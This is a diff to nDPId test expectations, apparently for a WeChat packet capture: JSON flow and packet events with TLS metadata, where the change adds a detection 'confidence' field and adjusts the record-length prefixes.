 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1492167367159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167367159,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8UGVAAEAGxNfAqAFny82XotNNAbtphJemAAAAAKACchASSQAAAgQFtAQCCAoAMMfDAAAAAAEDAwc="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1492167367227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167367227,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG700zSrc67fl9SHKASN8jkhQAAAgQFoAQCCApF0bHCADDHhQEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1492167367227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167367227,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0lZ9AAEAGf6XAqAFny82XotNMAbt+X1Ic0q3OvIAQAOVJ0gAAAQEICgAwx9RF0bHC"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167366908,"flow_last_seen":1492167367228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167367228,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167366908,"flow_last_seen":1492167367228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167367228,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1492167367489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167367489,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG7002nXL3IaYSXp6ASN8hVJQAAAgQFoAQCCApFrUycADDHwwEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1492167367489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167367489,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0UGZAAEAGxN7AqAFny82XotNNAbtphJenp1y9yYAQAOW6bQAAAQEICgAwyBZFrUyc"}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167366908,"flow_last_seen":1492167367549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167367549,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167366908,"flow_last_seen":1492167367550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167367550,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167366908,"flow_last_seen":1492167367549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167367549,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167366908,"flow_last_seen":1492167367550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167367550,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167377896,"flow_last_seen":1492167377896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167377896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1492167377896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167377896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KM9AAEAGqhzAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT1vHQAAAQEICgAw0kAycerX"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1492167377936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167377936,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0Fj0AADQGCA\/YOs2OwKgBZwG7wnvXK\/KwzDlUhIAQAVQWugAAAQEICjJymzYAMHos"}
@@ -109,26 +109,26 @@
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1492167378926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167378926,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cOpAAEAGpFLAqAFny82XotNPAbtxraOrAAAAAKACchDymgAAAgQFtAQCCAoAMNNBAAAAAAEDAwc="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1492167379033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167379033,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG7005qx4IjSnNKJ6ASN8i96gAAAgQFoAQCCApF0b0+ADDTAgEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1492167379034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167379034,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0mSVAAEAGfB\/AqAFny82XotNOAbtKc0onaseCJIAQAOUjLAAAAQEICgAw01xF0b0+"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378674,"flow_last_seen":1492167379034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167379034,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378674,"flow_last_seen":1492167379034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167379034,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1492167379279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167379279,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG7009k83t+ca2jrKASN8iurAAAAgQFoAQCCApFrVgaADDTQQEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1492167379279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167379279,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cOtAAEAGpFnAqAFny82XotNPAbtxraOsZPN7f4AQAOUT8AAAAQEICgAw05lFrVga"}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167378674,"flow_last_seen":1492167379396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167379396,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378674,"flow_last_seen":1492167379397,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167379397,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378926,"flow_last_seen":1492167380233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167380233,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167378674,"flow_last_seen":1492167379396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167379396,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378674,"flow_last_seen":1492167379397,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167379397,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378926,"flow_last_seen":1492167380233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167380233,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167380581,"flow_last_seen":1492167380581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167380581,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1492167380581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167380581,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8GvtAAEAG+kHAqAFny82XotNQAbtFV84kAAAAAKACchDy2AAAAgQFtAQCCAoAMNTfAAAAAAEDAwc="}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":309,"midstream":0,"ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01428{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":309,"midstream":0,"ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, 